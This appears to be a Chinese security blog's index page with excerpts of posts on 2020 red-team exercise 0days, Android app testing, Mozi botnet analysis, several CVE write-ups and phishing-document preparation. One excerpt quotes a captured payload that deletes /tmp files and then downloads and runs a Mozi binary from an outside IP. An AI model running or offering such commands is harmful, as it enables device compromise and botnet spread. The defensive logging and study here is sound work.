自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(19)
  • 收藏
  • 关注

原创 2020 HW记录

2020 HW 记录2020 HW行动0x00 0day 列表1-深信服EDR命令执行威胁等级:漏洞描述:payload工具参考2-奇安信天擎EDR管理服务器远程命令执行RCE漏洞威胁等级:漏洞描述:3-天X信dlp 未授权漏洞--应该是以前的4-深信服 vpn rce5-致远OA-A8-V5最新版未授权getshell6-通达OA11.6 preauth RCE0x01 其他2020 HW行动0x00 0day 列表收集2020hw期间的0day资料1-深信服EDR命令执行威胁等级:严重

2020-08-19 20:14:19 4707

原创 mac安装hydra

mac安装hydra

2022-04-28 10:52:28 1991

原创 moto edge 如何开启usb调试

设置,关于手机,版本号,连击几下搜索usb调试并打开

2022-01-06 16:56:10 2572

原创 pixel root 常见问题

0x00刷机教程https://github.com/r0ysue/AndroidSecurityStudy/blob/master/FRIDA/A01/README.md0x01 遇到的问题1 . fastboot flash recovery twrp.img 报错curl -O twr.imgfastboot flash recovery twrp.img 报错recovery 改成boot 如下图就能刷进2.pixel no command按住电源键和音量减小键fastboo

2021-12-28 14:17:35 1290

原创 windows安装drozer的遇到的问题

drozer

2021-12-24 15:08:57 1398

原创 202106 Mozi僵尸网络分析与学习

0x00 简介​Mozi僵尸网络是于2019年底首次出现在针对路由器和DVR 的攻击场景上的一种依靠 DHT 协议构建 P2P僵尸网络,并使用 ECDSA384 和异或算法来保证其组件和 P2P 网络的完整性和安全性。该恶意软件的目标是物联网设备,主要是未打补丁或 Telnet 密码较弱的路由器和 DVR。它从几个已知恶意软件家族(Gafgyt、Mirai 和 IoT Reaper)的源代码演变而来的,能够进行 DDoS 攻击、数据泄露以及命令或负载执行。​0x01 情况介绍​某日值班,soc

2021-06-19 16:03:02 2031

原创 Apache Druid 远程代码执行漏洞 (CVE-2021-25646)

Apache Druid 远程代码执行漏洞 (CVE-2021-25646)0x00 前言首发于timeline sec 团队公众号阿里云安全向Apache官方报告了Apache Druid远程代码执行漏洞,分配CVE编号为CVE-2021-256460x01 漏洞描述Apache Druid 包括执行用户提供的 JavaScript 的功能嵌入在各种类型请求中的代码。此功能在用于高信任度环境中,默认已被禁用。但是,在 Druid 0.20.0 及更低版本中,经过身份验证的用户可以构造传入的jso

2021-02-02 22:02:21 686 4

原创 APP测试中常用的drozer命令

APP测试中常用的drozer命令0x00 前言做安卓测试checklist的时候用到的drozer0x01 命令连接adb forward tcp:31415 tcp:31415drozer console connect测试命令1.找到该apprun app.package.list 列出所有包名run app.package.list -f app名称 2.列出详细APP信息:run app.package.info -a com.des3.查看APP的配置信息run

2020-11-26 17:14:41 320

原创 安卓权限Manifest.permission

权限部分 <uses-permission android:name="android.permission.INTERNET" />//Allows applications to open network sockets.网络链接Protection level: normalConstant Value: “android.permission.INTERNET”<uses-permission android:name="android

2020-11-06 10:22:35 2003

原创 CVE-2020-16898 Windows tcp/ip远程代码执行漏洞

CVE-2020-16898 Windows tcp/ip远程代码执行漏洞0x00 前言2020年10月13日,Microsoft 发布了 TCP/IP远程代码执行漏洞的风险通告,该漏洞编号为CVE-2020-16898。0x01 漏洞简述远程攻击者通过构造特制的ICMPv6 Router Advertisement(路由通告)数据包,并将其发送到远程Windows主机上,即可在目标主机上执行任意代码。要利用此漏洞,攻击者必须将特制的ICMPv6路由器广告数据包发送到远程Windows计算机。触发

2020-11-03 15:09:40 863

原创 IBM QRadar SIEM 反序列化代码执行

IBM QRadar SIEM 反序列化代码执行0x00 前言0x01 背景IBM QRadar SIEM是美国IBM公司的一套利用安全智能保护资产和信息远离高级威胁的解决方案。该方案提供对整个IT架构范围进行监督、生成详细的数据访问和用户活动报告等功能。 IBM QRadar SIEM 7.3和7.4版本存在安全漏洞,攻击者可利用该漏洞在系统上执行任意命令,造成不安全的Java反序列化反序列化的用户提供内容的函数。通过发送一个恶意的序列化的Java对象,攻击者可利用该漏洞可以利用此漏洞执行任意命令。

2020-11-03 11:34:48 1637 1

原创 ubuntu更新python3版本并安装scapy

下载编译安装下载wget https://www.python.org/ftp/python/3.7.3/Python-3.7.3.tgz其他版本下载:https://www.python.org/downloads/source/解压tar zxvf Python-3.7.3.tgzcd Python-3.7.3编译./configure --with-sslmakesudo make install报错解决ZipError:sudo apt install zlib*

2020-11-02 14:57:51 953

原创 常见User Agent

常见User Agent0x00 前言某项目重保时候,看设备发现不少爬虫的包以及那种扫描器修改UA伪装成搜索引擎爬虫试图绕过设备封堵的攻击,所以记录下来,以后好记住0x01 搜索引擎的UA谷歌User-Agent:谷歌 PC UAMozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)谷歌移动UAAdsBot-Google-Mobile (+http://www.google.com/mobile

2020-10-23 16:27:01 954

原创 2020 HW一些payload

2020 HW一些payload0x00 碎碎念以为监控可以抓0day之类的,结果还是常规老漏洞payload多印度的ip 多数打的是 &cmd=rm+-rf+/tmp/*;wget+http://27.6.195.86:53062/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 这种 也没啥新鲜的0x01 收集的Thinkphp/index.php?s=/Index/\think\a

2020-09-20 10:29:06 2804 2

原创 2020 HW记录-2

2020 HW记录-20x00 前言9.11 hw开始了,记录下整个hw期间爆的0day虽然自己有点想法 有所收获,碍于信息比较敏感的缘故,还是hw结束后再发这儿比较好。hw可是个学习的好机会啊,冲鸭大伙儿0x02 漏洞一.常规漏洞1.Apache DolphinScheduler高危漏洞漏洞编号:CVE-2020-11974、CVE-2020-13922暂无poc1.1Apache DolphinScheduler权限覆盖漏洞(CVE-2020-13922)受影响版本Apac

2020-09-11 18:45:05 1114

原创 CVE-2020-1957 shiro权限绕过漏洞分析

CVE-2020-1957 shiro权限绕过漏洞分析0x00 前言最近在看 CVE-2020-11989 ,11989是CVE-2020-1957后的⼀种绕过⽅法,这漏洞有references 所以按着来复现并写出了一些自己踩坑的点0x01 漏洞背景0x02 漏洞环境准备1.下载demo代码shiro-basic。https://github.com/lenve/javaboy-code-samples/tree/master/shiro/shiro-basic使用https://m

2020-08-28 17:33:25 1467

原创 docker系列-命令篇

docker系列-命令篇0x00 前言最近在搞ctf出题,平时都是解题,出题也只能出简单题了,但是需要弄docker提交就头疼,记录一下用过的命令0x01 命令列出所有的容器 IDdocker ps -aq停止所有的容器docker stop tag删除所有的容器docker rm tag列出本机Docker上已经安装的镜像:docker images搜索Docker hub上面的镜像# 普通搜索,以Tomcat为例docker search tomcat# 搜索star大

2020-08-28 15:52:43 162

原创 【0day RCE】 Horde Groupware Webmail Edition RCE

0x00 简介Horde Groupware Webmail是美国Horde公司的一套基于浏览器的企业级通信套件。 Horde Groupware Webmail中存在代码注入漏洞。该漏洞源于外部输入数据构造代码段的过程中,网络系统或产品未正确过滤其中的特殊元素。攻击者可利用该漏洞生成非法的代码段,修改网络系统或组件的预期的执行控制流。0x01 漏洞详情ZDI-20-1051ZDI-CAN-10436此漏洞使远程攻击者可以在受影响的Horde Groupware Webmail Edition..

2020-08-20 10:45:10 1109

原创 钓鱼攻击中的文件制作一

0x00 背景第一次做钓鱼的项目,给的2天时间,这项目之前已经有师傅钓过一次鱼了,但是被甲方叫停了。这次是跟着上一个师傅遗留下来的东西,但是账号啥的都不能用了,准备了三个方向的钓鱼,但是之前没有钓鱼经验,所以都是现学现卖,钓鱼除了伪造站点制作钓鱼网站以外,还有是附件钓鱼。我这新手打算用cs生成宏,加密文档试一下0x01 准备cs --cobaltstrike 官网https://www.cobaltstrike.com/钓鱼简历文档、其他文档cs的教程 奇安...

2020-08-03 19:35:39 742

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除